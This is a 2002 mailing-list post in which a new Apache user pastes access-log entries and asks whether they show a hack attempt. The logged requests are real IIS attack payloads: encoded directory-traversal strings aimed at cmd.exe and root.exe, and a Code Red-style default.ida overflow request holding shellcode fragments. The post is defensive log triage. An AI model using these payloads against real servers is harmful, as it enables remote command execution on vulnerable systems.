What is happening?

Huan Yee Chew Fri, 09 Aug 2002 14:40:08 -0700

Hi,


I've just started using Apache recently.  This was recorded in my access 
log last night.  Would anyone be able to help me out telling me what's 
happening here?

203.233.228.227 - - [10/Aug/2002:05:28:01 +1200] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:03 +1200] "GET 
/MSADC/root.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:04 +1200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:05 +1200] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:06 +1200] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:07 +1200] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:08 +1200] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:09 +1200] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 
HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:10 +1200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:11 +1200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:12 +1200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:13 +1200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:14 +1200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 756
203.233.228.227 - - [10/Aug/2002:05:28:15 +1200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 756
203.233.228.227 - - [10/Aug/2002:05:28:16 +1200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
203.233.228.227 - - [10/Aug/2002:05:28:17 +1200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 829
80.24.65.24 - - [10/Aug/2002:09:01:24 +1200] "GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 
HTTP/1.0" 400 342

These access looks very obscure to me.  Could this be a hack attempt?  Any 
info will be much appreciated.  Thanks.

Huan

What is happening?

Reply via email to